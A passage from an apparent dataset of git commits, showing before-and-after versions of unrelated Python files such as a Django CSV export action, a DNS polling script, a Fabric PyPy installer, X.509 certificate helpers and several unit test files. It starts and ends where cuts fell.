self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = self.opts.get('filename', 'export_{classname}.csv')
if callable(filename):
filename = filename(admin)
else:
filename = filename.format(
classname=admin.__class__.__name__,
model=admin.model._meta.module_name,
app_label=admin.model._meta.app_label,
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
from django.http import StreamingHttpResponse
from django.utils.encoding import force_text
from .models import modelserialiser_factory
from .simplecsv import CSV
class ExportCsv(object):
def __init__(self, serialiser=None, label=None, **opts):
self.serialiser = serialiser
self.opts = opts
if label:
self.short_description = label
def __call__(self, admin, request, queryset):
if self.serialiser is None:
ser_class = modelserialiser_factory(
'%sSerialiser' % admin.__class__.__name__,
admin.model,
**self.opts
)
else:
ser_class = self.serialiser
def inner(ser):
csv = CSV(fields=ser._fields.keys())
yield csv.write_headers()
for obj in queryset:
data = {
key: force_text(val)
for key, val in ser.object_deflate(obj).items()
}
yield csv.write_dict(data)
response = StreamingHttpResponse(inner(ser_class()), content_type='text/csv')
filename = admin.csv_
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
| bsd-3-clause | Python |
1e03772e601fb6ed0eb6aa59555af61c29b2650f | remove fungible in parent class constructor call | nedlowe/amaas-core-sdk-python,amaas-fintech/amaas-core-sdk-python,amaas-fintech/amaas-core-sdk-python,paul-rs/amaas-core-sdk-python,nedlowe/amaas-core-sdk-python,paul-rs/amaas-core-sdk-python | amaascore/assets/cfd.py | amaascore/assets/cfd.py | from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, date
from dateutil import parser
from amaascore.assets.derivative import Derivative
class ContractForDifference(Derivative):
def __init__(self, asset_manager_id, asset_id, asset_issuer_id=None, asset_status='Active', display_name='',
description='', country_id=None, venue_id=None, currency=None, issue_date=None,
links=None, references=None,
*args, **kwargs):
super(ContractForDifference, self).__init__(asset_manager_id=asset_manager_id, asset_id=asset_id,
asset_issuer_id=asset_issuer_id,
asset_status=asset_status, display_name=display_name,
description=description,
country_id=country_id, venue_id=venue_id, issue_date=issue_date,
currency=currency, links=links,
references=references,
*args, **kwargs)
| from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, date
from dateutil import parser
from amaascore.assets.derivative import Derivative
class ContractForDifference(Derivative):
def __init__(self, asset_manager_id, asset_id, asset_issuer_id=None, asset_status='Active', display_name='',
description='', country_id=None, venue_id=None, currency=None, issue_date=None,
links=None, references=None,
*args, **kwargs):
super(ContractForDifference, self).__init__(asset_manager_id=asset_manager_id, asset_id=asset_id,
fungible=False, asset_issuer_id=asset_issuer_id,
asset_status=asset_status, display_name=display_name,
description=description,
country_id=country_id, venue_id=venue_id, issue_date=issue_date,
currency=currency, links=links,
references=references,
*args, **kwargs)
| apache-2.0 | Python |
63eaf0faf56a70fadbd37f0acac6f5e61c7b19eb | Change sleep function to the end to do repeat everytime | felipebhz/checkdns | checkdns.py | checkdns.py | # coding=utf8
# 31.220.16.242
# 216.58.222.46
import socket
import time
import webbrowser
def checkdns():
print time.ctime()
retorno = True
try:
ip = socket.gethostbyname('google.com')
print ("O IP do host verificado é: " + ip)
if ip == "216.58.22.46":
retorno = False
url = 'http://www.google.com.br/'
webbrowser.open_new_tab(url)
else:
print "DNS ainda não atualizado. Aguardando 30s."
except socket.gaierror:
print "Nenhum host definido para o domínio. Aguardando 30s."
return retorno
condicao = True
while condicao:
condicao = checkdns()
time.sleep( 30 ) | # coding=utf8
# 31.220.16.242
# 216.58.222.46
import socket
import time
import webbrowser
def checkdns():
print time.ctime()
retorno = True
try:
ip = socket.gethostbyname('google.com')
print ("O IP do host verificado é: " + ip)
if ip == "216.58.222.46":
retorno = False
url = 'http://www.google.com.br/'
webbrowser.open_new_tab(url)
else:
print "DNS ainda não atualizado. Aguardando 30s."
time.sleep( 30 )
except socket.gaierror:
print "Nenhum host definido para o domínio. Aguardando 30s."
time.sleep( 30 )
return retorno
condicao = True
while condicao:
condicao = checkdns() | mit | Python |
4c819629552a31748e4bb266c1c13726276d7944 | Use cross version compatible iteration | peterbrittain/asciimatics,peterbrittain/asciimatics | tests/test_renderers.py | tests/test_renderers.py | import unittest
from asciimatics.renderers import StaticRenderer
from asciimatics.screen import Screen
class TestRenderers(unittest.TestCase):
def test_static_renderer(self):
"""
Check that the base static renderer class works.
"""
# Check basic API for a renderer...
renderer = StaticRenderer(images=["A\nB", "C "])
# Max height should match largest height of any entry.
self.assertEqual(renderer.max_height, 2)
# Max width should match largest width of any entry.
self.assertEqual(renderer.max_width, 3)
# Images should be the parsed versions of the original strings.
images = renderer.images
self.assertEqual(next(images), ["A", "B"])
self.assertEqual(next(images), ["C "])
# String presentation should be the first image as a printable string.
self.assertEqual(str(renderer), "A\nB")
def test_colour_maps(self):
"""
Check that the ${} syntax is parsed correctly.
"""
# Check the ${fg, attr} variant
renderer = StaticRenderer(images=["${3,1}*"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["*"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_YELLOW, Screen.A_BOLD))
# Check the ${fg} variant
renderer = StaticRenderer(images=["${1}XY${2}Z"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["XYZ"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][1], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][2], (Screen.COLOUR_GREEN, 0))
if __name__ == '__main__':
unittest.main()
| import unittest
from asciimatics.renderers import StaticRenderer
from asciimatics.screen import Screen
class TestRenderers(unittest.TestCase):
def test_static_renderer(self):
"""
Check that the base static renderer class works.
"""
# Check basic API for a renderer...
renderer = StaticRenderer(images=["A\nB", "C "])
# Max height should match largest height of any entry.
self.assertEqual(renderer.max_height, 2)
# Max width should match largest width of any entry.
self.assertEqual(renderer.max_width, 3)
# Images should be the parsed versions of the original strings.
images = renderer.images
self.assertEqual(images.__next__(), ["A", "B"])
self.assertEqual(images.__next__(), ["C "])
# String presentation should be the first image as a printable string.
self.assertEqual(str(renderer), "A\nB")
def test_colour_maps(self):
"""
Check that the ${} syntax is parsed correctly.
"""
# Check the ${fg, attr} variant
renderer = StaticRenderer(images=["${3,1}*"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["*"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_YELLOW, Screen.A_BOLD))
# Check the ${fg} variant
renderer = StaticRenderer(images=["${1}XY${2}Z"])
output = renderer.rendered_text
self.assertEqual(len(output[0]), len(output[1]))
self.assertEqual(output[0], ["XYZ"])
self.assertEqual(output[1][0][0], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][1], (Screen.COLOUR_RED, 0))
self.assertEqual(output[1][0][2], (Screen.COLOUR_GREEN, 0))
if __name__ == '__main__':
unittest.main()
| apache-2.0 | Python |
90b991c19ef5249a09410b19c33f2c8bfe9b5ca7 | Install pypy for proper architechture. | alex/braid,alex/braid | braid/pypy.py | braid/pypy.py | import re
from os import path
from fabric.api import cd, task, sudo, abort
from braid import info
from braid.utils import fails
pypyURLs = {
'x86_64': 'https://bitbucket.org/pypy/pypy/downloads/pypy-2.0.2-linux64.tar.bz2',
'x86': 'https://bitbucket.org/pypy/pypy/downloads/pypy-2.0.2-linux.tar.bz2',
}
pypyDir = '/opt/pypy-2.0'
setuptoolsURL = 'http://peak.telecommunity.com/dist/ez_setup.py'
pipURL = 'https://raw.github.com/pypa/pip/master/contrib/get-pip.py'
@task
def install():
sudo('/bin/mkdir -p /opt')
if fails('/usr/bin/id {}'.format('pypy')):
sudo('/usr/sbin/useradd --home-dir {} --gid bin '
'-M --system --shell /bin/false '
'pypy'.format(pypyDir))
else:
sudo('/usr/sbin/usermod --home {} pypy'.format(pypyDir))
with cd('/opt'):
if info.arch() == 'x86_64':
pypyURL = pypyURLs['x86_64']
elif re.match('i.86', info.arch()):
pypyURL = pypyURLs['x86']
else:
abort("Can't install pypy on unknown architecture.")
for url in pypyURL, setuptoolsURL, pipURL:
sudo('/usr/bin/wget -nc {}'.format(url))
sudo('/bin/tar xf {}'.format(path.basename(pypyURL)))
for url in setuptoolsURL, pipURL:
sudo('~pypy/bin/pypy {}'.format(path.basename(url)))
sudo('~pypy/bin/pip install pyopenssl')
sudo('~pypy/bin/pip install svn+svn://svn.twistedmatrix.com/svn/Twisted/trunk/')
| from os import path
from fabric.api import cd, task, sudo
from braid import fails
pypyURL = 'https://bitbucket.org/pypy/pypy/downloads/pypy-2.0-linux64.tar.bz2'
setuptoolsURL = 'http://peak.telecommunity.com/dist/ez_setup.py'
pipURL = 'https://raw.github.com/pypa/pip/master/contrib/get-pip.py'
pypyDir = '/opt/pypy-2.0'
@task
def install():
sudo('/bin/mkdir -p /opt')
if fails('/usr/bin/id {}'.format('pypy')):
sudo('/usr/sbin/useradd --home-dir {} --gid bin '
'-M --system --shell /bin/false '
'pypy'.format(pypyDir))
else:
sudo('/usr/sbin/usermod --home {} pypy'.format(pypyDir))
with cd('/opt'):
for url in pypyURL, setuptoolsURL, pipURL:
sudo('/usr/bin/wget -nc {}'.format(url))
sudo('/bin/tar xf {}'.format(path.basename(pypyURL)))
for url in setuptoolsURL, pipURL:
sudo('~pypy/bin/pypy {}'.format(path.basename(url)))
sudo('~pypy/bin/pip install pyopenssl')
sudo('~pypy/bin/pip install svn+svn://svn.twistedmatrix.com/svn/Twisted/trunk/')
| mit | Python |
25030673476f9eb99a4eff980d7bb050fdaa2568 | Print size of result lists in check_files | symbooglix/boogie-runner,symbooglix/boogie-runner | analysis/check_files.py | analysis/check_files.py | #!/usr/bin/env python
# vim: set sw=2 ts=2 softtabstop=2 expandtab:
import argparse
import os
import logging
import sys
import yaml
try:
# Try to use libyaml which is faster
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
# fall back on python implementation
from yaml import Loader, Dumper
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-l","--log-level",type=str, default="info", dest="log_level", choices=['debug','info','warning','error'])
parser.add_argument('first_yml', type=argparse.FileType('r'))
parser.add_argument('second_yml', type=argparse.FileType('r'))
pargs = parser.parse_args(args)
logLevel = getattr(logging, pargs.log_level.upper(),None)
logging.basicConfig(level=logLevel)
firstResults = yaml.load(pargs.first_yml, Loader=Loader)
secondResults = yaml.load(pargs.second_yml, Loader=Loader)
assert isinstance(firstResults, list)
assert isinstance(secondResults, list)
if len(firstResults) == 0:
logging.error('First Result list is empty')
return 1
if len(secondResults) == 0:
logging.error('Second Result list is empty')
return 1
print("# of results in first {}".format(len(firstResults)))
print("# of results in second {}".format(len(secondResults)))
# Create sets of used files
programsInFirst = set()
programsInSecond = set()
for r in firstResults:
programsInFirst.add(r['program'])
for r in secondResults:
programsInSecond.add(r['program'])
resultMissingFromSecond= [ ]
resultMissingFromFirst=[ ]
# Check for files missing in second
for r in firstResults:
if not (r['program'] in programsInSecond):
resultMissingFromSecond.append(r)
logging.warning('Program {} is missing from second but present in first'.format(r['program']))
# Check for files missing in first
for r in secondResults:
if not (r['program'] in programsInFirst):
resultMissingFromFirst.append(r)
logging.warning('Program {} is missing from first but present in second'.format(r['program']))
print("# of programs missing from second but present in first: {}".format(len(resultMissingFromSecond)))
print("# of programs missing from first but present in second: {}".format(len(resultMissingFromFirst)))
print("")
print("# Missing from second")
for r in resultMissingFromSecond:
print(r)
print("# Missing from first")
for r in resultMissingFromFirst:
print(r)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| #!/usr/bin/env python
# vim: set sw=2 ts=2 softtabstop=2 expandtab:
import argparse
import os
import logging
import sys
import yaml
try:
# Try to use libyaml which is faster
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
# fall back on python implementation
from yaml import Loader, Dumper
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-l","--log-level",type=str, default="info", dest="log_level", choices=['debug','info','warning','error'])
parser.add_argument('first_yml', type=argparse.FileType('r'))
parser.add_argument('second_yml', type=argparse.FileType('r'))
pargs = parser.parse_args(args)
logLevel = getattr(logging, pargs.log_level.upper(),None)
logging.basicConfig(level=logLevel)
firstResults = yaml.load(pargs.first_yml, Loader=Loader)
secondResults = yaml.load(pargs.second_yml, Loader=Loader)
assert isinstance(firstResults, list)
assert isinstance(secondResults, list)
if len(firstResults) == 0:
logging.error('First Result list is empty')
return 1
if len(secondResults) == 0:
logging.error('Second Result list is empty')
return 1
# Create set of all used files
programsInFirst = set()
programsInSecond = set()
for r in firstResults:
programsInFirst.add(r['program'])
for r in secondResults:
programsInSecond.add(r['program'])
resultMissingFromSecond= [ ]
resultMissingFromFirst=[ ]
# Check for files missing in second
for r in firstResults:
if not (r['program'] in programsInSecond):
resultMissingFromSecond.append(r)
logging.warning('Program {} is missing from second but present in first'.format(r['program']))
# Check for files missing in first
for r in secondResults:
if not (r['program'] in programsInFirst):
resultMissingFromFirst.append(r)
logging.warning('Program {} is missing from first but present in second'.format(r['program']))
print("# of programs missing from second but present in first: {}".format(len(resultMissingFromSecond)))
print("# of programs missing from first but present in second: {}".format(len(resultMissingFromFirst)))
print("")
print("# Missing from second")
for r in resultMissingFromSecond:
print(r)
print("# Missing from first")
for r in resultMissingFromFirst:
print(r)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| bsd-3-clause | Python |
d115c0ceb08a350f7b367f61627ced5ab03df833 | Remove useless space | nok/sklearn-porter | sklearn_porter/language/__init__.py | sklearn_porter/language/__init__.py | # -*- coding: utf-8 -*-
import sklearn_porter.language.c
import sklearn_porter.language.go
import sklearn_porter.language.java
import sklearn_porter.language.js
import sklearn_porter.language.php
import sklearn_porter.language.ruby
LANGUAGES = {
c.KEY: c,
go.KEY: go,
java.KEY: java,
js.KEY: js,
php.KEY: php,
ruby.KEY: ruby
}
__all__ = ['c', 'go', 'java', 'js', 'php', 'ruby', 'LANGUAGES']
| # -*- coding: utf-8 -*-
import sklearn_porter.language.c
import sklearn_porter.language.go
import sklearn_porter.language.java
import sklearn_porter.language.js
import sklearn_porter.language.php
import sklearn_porter.language.ruby
LANGUAGES = {
c.KEY: c,
go.KEY: go,
java.KEY: java,
js.KEY: js,
php.KEY: php,
ruby.KEY: ruby
}
__all__ = ['c', 'go', 'java', 'js', 'php', 'ruby', 'LANGUAGES']
| bsd-3-clause | Python |
3fdad9fb89d70b8d81483b646e16d20f076e0ebd | Test urxvt alpha | dylanaraps/pywal,dylanaraps/pywal,dylanaraps/pywal | tests/test_sequences.py | tests/test_sequences.py | """Test sequence functions."""
import unittest
import unittest.mock
import io
from pywal import sequences
from pywal import util
# Import colors.
COLORS = util.read_file_json("tests/test_files/test_file.json")
class Testsequences(unittest.TestCase):
"""Test the sequence functions."""
def test_set_special(self):
"""> Create special escape sequence."""
result = sequences.set_special(11, COLORS["special"]["background"])
self.assertEqual(result, "\033]11;#1F211E\007")
def test_set_special_alpha(self):
"""> Create special escape sequence with alpha."""
util.Color.alpha_num = 40
result = sequences.set_special(11, COLORS["special"]["background"])
self.assertEqual(result, "\033]11;[40]#1F211E\007")
def test_set_color(self):
"""> Create color escape sequence."""
result = sequences.set_color(11, COLORS["colors"]["color0"])
self.assertEqual(result, "\033]4;11;#1F211E\007")
def test_send_srquences(self):
"""> Send sequences to all open terminals."""
with unittest.mock.patch('sys.stdout', new=io.StringIO()) as fake_out:
sequences.send(COLORS, False)
data = fake_out.getvalue().strip()
self.assertTrue(data.endswith("colors: Set terminal colors"))
if __name__ == "__main__":
unittest.main()
| """Test sequence functions."""
import unittest
import unittest.mock
import io
from pywal import sequences
from pywal import util
# Import colors.
COLORS = util.read_file_json("tests/test_files/test_file.json")
class Testsequences(unittest.TestCase):
"""Test the sequence functions."""
def test_set_special(self):
"""> Create special escape sequence."""
result = sequences.set_special(11, COLORS["special"]["background"])
self.assertEqual(result, "\033]11;#1F211E\007")
def test_set_color(self):
"""> Create color escape sequence."""
result = sequences.set_color(11, COLORS["colors"]["color0"])
self.assertEqual(result, "\033]4;11;#1F211E\007")
def test_send_srquences(self):
"""> Send sequences to all open terminals."""
with unittest.mock.patch('sys.stdout', new=io.StringIO()) as fake_out:
sequences.send(COLORS, False)
data = fake_out.getvalue().strip()
self.assertTrue(data.endswith("colors: Set terminal colors"))
if __name__ == "__main__":
unittest.main()
| mit | Python |
b86348349906c88b6946f757485cf41f909a9a91 | fix subtitle test for newer versions of ffmpeg | PyAV-Org/PyAV,danielballan/PyAV,pupil-labs/PyAV,mcpv/PyAV,xxr3376/PyAV,markreidvfx/PyAV,markreidvfx/PyAV,PyAV-Org/PyAV,markreidvfx/PyAV,danielballan/PyAV,mikeboers/PyAV,mcpv/PyAV,danielballan/PyAV,xxr3376/PyAV,pupil-labs/PyAV,xxr3376/PyAV,mcpv/PyAV,pupil-labs/PyAV,mikeboers/PyAV,pupil-labs/PyAV | tests/test_subtitles.py | tests/test_subtitles.py | import sys
from .common import *
from av.subtitles.subtitle import *
class TestSubtitle(TestCase):
def test_movtext(self):
path = fate_suite('sub/MovText_capability_tester.mp4')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 3)
self.assertIsInstance(subs[0][0], AssSubtitle)
self.assertIn(subs[0][0].ass, ('Dialogue: 0,0:00:00.97,0:00:02.54,Default,- Test 1.\\N- Test 2.\r\n',
'Dialogue: 0,0:00:00.97,0:00:02.54,Default,,0,0,0,,- Test 1.\\N- Test 2.\r\n'))
def test_vobsub(self):
path = fate_suite('sub/vobsub.sub')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 43)
sub = subs[0][0]
self.assertIsInstance(sub, BitmapSubtitle)
self.assertEqual(sub.x, 259)
self.assertEqual(sub.y, 379)
self.assertEqual(sub.width, 200)
self.assertEqual(sub.height, 24)
bms = sub.planes
self.assertEqual(len(bms), 1)
if hasattr(__builtins__, 'buffer'):
self.assertEqual(len(buffer(bms[0])), 4800)
if hasattr(__builtins__, 'memoryview'):
self.assertEqual(len(memoryview(bms[0])), 4800)
| import sys
from .common import *
from av.subtitles.subtitle import *
class TestSubtitle(TestCase):
def test_movtext(self):
path = fate_suite('sub/MovText_capability_tester.mp4')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 3)
self.assertIsInstance(subs[0][0], AssSubtitle)
self.assertEqual(subs[0][0].ass, 'Dialogue: 0,0:00:00.97,0:00:02.54,Default,- Test 1.\\N- Test 2.\r\n')
def test_vobsub(self):
path = fate_suite('sub/vobsub.sub')
fh = av.open(path)
subs = []
for packet in fh.demux():
try:
subs.extend(packet.decode())
except ValueError:
raise SkipTest
self.assertEqual(len(subs), 43)
sub = subs[0][0]
self.assertIsInstance(sub, BitmapSubtitle)
self.assertEqual(sub.x, 259)
self.assertEqual(sub.y, 379)
self.assertEqual(sub.width, 200)
self.assertEqual(sub.height, 24)
bms = sub.planes
self.assertEqual(len(bms), 1)
if hasattr(__builtins__, 'buffer'):
self.assertEqual(len(buffer(bms[0])), 4800)
if hasattr(__builtins__, 'memoryview'):
self.assertEqual(len(memoryview(bms[0])), 4800)
| bsd-3-clause | Python |
4a7484bccc9a92353681fb155f15629fa1059cd1 | Format users | AlexLloyd1/pointy-mcpointface | slackbot/get_scoreboard.py | slackbot/get_scoreboard.py | import logging
from typing import Dict, List, Tuple
from werkzeug.datastructures import ImmutableMultiDict
from database.main import connect, channel_resp
from database.team import check_all_scores
logger = logging.getLogger(__name__)
def get_scoreboard(form: ImmutableMultiDict) -> Dict[str, str]:
logger.debug(f"Scoreboard request: {form}")
team_id = form.get('team_id', '')
with connect() as conn:
scoreboard_list = check_all_scores(conn, team_id)
return channel_resp(_parse_scoreboard(scoreboard_list))
def _parse_scoreboard(scoreboard_list: List[Tuple[str, int]]) -> str:
text = f'Here\'s a list of my favourite people:'
for index, (subject, score) in enumerate(scoreboard_list):
text += f'\n{index+1}. <@{subject}> [{score} point{"s" if score != 1 else ""}]'
if index == 0:
text += ' :crown:'
elif index + 1 == len(scoreboard_list):
text += ' :hankey:'
return text
| import logging
from typing import Dict, List, Tuple
from werkzeug.datastructures import ImmutableMultiDict
from database.main import connect, channel_resp
from database.team import check_all_scores
logger = logging.getLogger(__name__)
def get_scoreboard(form: ImmutableMultiDict) -> Dict[str, str]:
logger.debug(f"Scoreboard request: {form}")
team_id = form.get('team_id', '')
with connect() as conn:
scoreboard_list = check_all_scores(conn, team_id)
return channel_resp(_parse_scoreboard(scoreboard_list))
def _parse_scoreboard(scoreboard_list: List[Tuple[str, int]]) -> str:
text = f'Here\'s a list of my favourite people:'
for index, (subject, score) in enumerate(scoreboard_list):
text += f'\n{index+1}. {subject} [{score} point{"s" if score != 1 else ""}]'
if index == 0:
text += ' :crown:'
elif index + 1 == len(scoreboard_list):
text += ' :hankey:'
return text
| mit | Python |
29bfc1049352f59fca0b625d0ecbc7177fb565c7 | Change default value for certificate location. | sholsapp/py509 | py509/x509.py | py509/x509.py | import socket
import uuid
from OpenSSL import crypto
def make_serial():
"""Make a random serial number."""
return uuid.uuid4().int
def make_pkey(key_type=crypto.TYPE_RSA, key_bits=4096):
"""Make a public/private key pair."""
key = crypto.PKey()
key.generate_key(key_type, key_bits)
return key
def make_certificate_signing_request(pkey, digest='sha512', **name):
"""Make a certificate signing request."""
csr = crypto.X509Req()
subj = csr.get_subject()
subj.C = name.get('C', 'US')
subj.ST = name.get('ST', 'CA')
subj.L = name.get('L', 'Home')
subj.O = name.get('O', 'Home')
subj.OU = name.get('OU', socket.gethostbyname(socket.getfqdn()))
subj.CN = name.get('CN', socket.getfqdn())
csr.set_pubkey(pkey)
csr.set_version(3)
csr.sign(pkey, digest)
return csr
def make_certificate(csr, ca_key, ca_cert, serial, not_before, not_after, digest='sha512', version=2, exts=()):
"""Make a certificate."""
crt = crypto.X509()
crt.set_serial_number(serial)
crt.gmtime_adj_notBefore(not_before)
crt.gmtime_adj_notAfter(not_after)
crt.set_issuer(ca_cert.get_subject())
crt.set_subject(csr.get_subject())
crt.set_pubkey(csr.get_pubkey())
crt.set_version(version)
crt.add_extensions(exts)
crt.sign(ca_key, digest)
return crt
def make_certificate_authority(**name):
"""Make a certificate authority.
A certificate authority can sign certificates. For clients to be able to
validate certificates signed by your certificate authorithy, they must trust
the certificate returned by this function.
"""
key = make_pkey()
csr = make_certificate_signing_request(key, **name)
crt = make_certificate(csr, key, csr, make_serial(), 0, 10 * 365 * 24 * 60 * 60, exts=[crypto.X509Extension(b'basicConstraints', True, b'CA:TRUE')])
return key, crt
| import socket
import uuid
from OpenSSL import crypto
def make_serial():
"""Make a random serial number."""
return uuid.uuid4().int
def make_pkey(key_type=crypto.TYPE_RSA, key_bits=4096):
"""Make a public/private key pair."""
key = crypto.PKey()
key.generate_key(key_type, key_bits)
return key
def make_certificate_signing_request(pkey, digest='sha512', **name):
"""Make a certificate signing request."""
csr = crypto.X509Req()
subj = csr.get_subject()
subj.C = name.get('C', 'US')
subj.ST = name.get('ST', 'CA')
subj.L = name.get('L', 'San Diego')
subj.O = name.get('O', 'Home')
subj.OU = name.get('OU', socket.gethostbyname(socket.getfqdn()))
subj.CN = name.get('CN', socket.getfqdn())
csr.set_pubkey(pkey)
csr.set_version(3)
csr.sign(pkey, digest)
return csr
def make_certificate(csr, ca_key, ca_cert, serial, not_before, not_after, digest='sha512', version=2, exts=()):
"""Make a certificate."""
crt = crypto.X509()
crt.set_serial_number(serial)
crt.gmtime_adj_notBefore(not_before)
crt.gmtime_adj_notAfter(not_after)
crt.set_issuer(ca_cert.get_subject())
crt.set_subject(csr.get_subject())
crt.set_pubkey(csr.get_pubkey())
crt.set_version(version)
crt.add_extensions(exts)
crt.sign(ca_key, digest)
return crt
def make_certificate_authority(**name):
"""Make a certificate authority.
A certificate authority can sign certificates. For clients to be able to
validate certificates signed by your certificate authorithy, they must trust
the certificate returned by this function.
"""
key = make_pkey()
csr = make_certificate_signing_request(key, **name)
crt = make_certificate(csr, key, csr, make_serial(), 0, 10 * 365 * 24 * 60 * 60, exts=[crypto.X509Extension(b'basicConstraints', True, b'CA:TRUE')])
return key, crt
| apache-2.0 | Python |
e05a4f17fcf0ec1bedcc8188d584d31616c4e0af | Update test_toml_file.py | sdispater/tomlkit | tests/test_toml_file.py | tests/test_toml_file.py | import os
from tomlkit.toml_document import TOMLDocument
from tomlkit.toml_file import TOMLFile
def test_toml_file(example):
original_content = example("example")
toml_file = os.path.join(os.path.dirname(__file__), "examples", "example.toml")
toml = TOMLFile(toml_file)
content = toml.read()
assert isinstance(content, TOMLDocument)
assert content["owner"]["organization"] == "GitHub"
toml.write(content)
try:
with open(toml_file, encoding="utf-8") as f:
assert original_content == f.read()
finally:
with open(toml_file, "w", encoding="utf-8", newline="") as f:
assert f.write(original_content)
def test_keep_old_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nb = 2\r\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nb = 3\r\n"
def test_keep_old_eol_2(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\nb = 2\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\nb = 3\n"
def test_mixed_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nrb = 2\n")
f = TOMLFile(toml_path)
f.write(f.read())
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nrb = 2\n"
| import os
from tomlkit.toml_document import TOMLDocument
from tomlkit.toml_file import TOMLFile
def test_toml_file(example):
original_content = example("example")
toml_file = os.path.join(os.path.dirname(__file__), "examples", "example.toml")
toml = TOMLFile(toml_file)
content = toml.read()
assert isinstance(content, TOMLDocument)
assert content["owner"]["organization"] == "GitHub"
toml.write(content)
try:
with open(toml_file, encoding="utf-8") as f:
assert original_content == f.read()
finally:
with open(toml_file, "w", encoding="utf-8", newline="") as f:
assert f.write(original_content)
def test_keep_old_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nb = 2\r\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nb = 3\r\n"
def test_keep_old_eol_2(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\nb = 2\n")
f = TOMLFile(toml_path)
content = f.read()
content["b"] = 3
f.write(content)
with open(toml_path, "rb") as f:
assert f.read() == b"a = 1\nb = 3\n"
def test_mixed_eol(tmpdir):
toml_path = str(tmpdir / "pyproject.toml")
with open(toml_path, "wb+") as f:
f.write(b"a = 1\r\nrb = 2\n")
f = TOMLFile(toml_path)
f.write(f.read())
with io.open(toml_path, "rb") as f:
assert f.read() == b"a = 1\r\nrb = 2\n"
| mit | Python |
12cc5e752f9aa4700b57e3647c3676aba70bb996 | use valid exception for Python 2.7 | h2non/riprova | tests/whitelist_test.py | tests/whitelist_test.py | # -*- coding: utf-8 -*-
import pytest
from riprova import ErrorWhitelist, NotRetriableError
def test_error_whitelist():
whitelist = ErrorWhitelist()
assert type(ErrorWhitelist.WHITELIST) is set
assert len(whitelist._whitelist) > 4
assert type(whitelist._whitelist) is set
assert whitelist._whitelist is not ErrorWhitelist.WHITELIST
# Test setter
whitelist.errors = (Exception, RuntimeError)
# Test getter
assert whitelist.errors == set([Exception, RuntimeError])
# Test add()
whitelist.add(BaseException, SystemExit)
assert whitelist.errors == set([Exception, RuntimeError,
BaseException, SystemExit])
def test_error_whitelist_invalid():
whitelist = ErrorWhitelist()
with pytest.raises(TypeError):
whitelist.errors = dict()
with pytest.raises(TypeError):
whitelist.errors = None
with pytest.raises(TypeError):
whitelist.add(None)
with pytest.raises(TypeError):
whitelist.add(dict())
class NoRetryError(NotRetriableError):
pass
class RetryError(NotRetriableError):
__retry__ = True
@pytest.mark.parametrize("error,expected", [
(SystemExit(), True),
(ImportError(), True),
(ReferenceError(), True),
(SyntaxError(), True),
(KeyboardInterrupt(), True),
(NotRetriableError(), True),
(NoRetryError(), True),
(RetryError(), False),
(ReferenceError(), True),
(Exception(), False),
(RuntimeError(), False),
(TypeError(), False),
(ValueError(), False),
])
def test_error_whitelist_iswhitedlisted(error, expected):
assert ErrorWhitelist().iswhitelisted(error) is expected
| # -*- coding: utf-8 -*-
import pytest
from riprova import ErrorWhitelist, NotRetriableError
def test_error_whitelist():
whitelist = ErrorWhitelist()
assert type(ErrorWhitelist.WHITELIST) is set
assert len(whitelist._whitelist) > 4
assert type(whitelist._whitelist) is set
assert whitelist._whitelist is not ErrorWhitelist.WHITELIST
# Test setter
whitelist.errors = (Exception, RuntimeError)
# Test getter
assert whitelist.errors == set([Exception, RuntimeError])
# Test add()
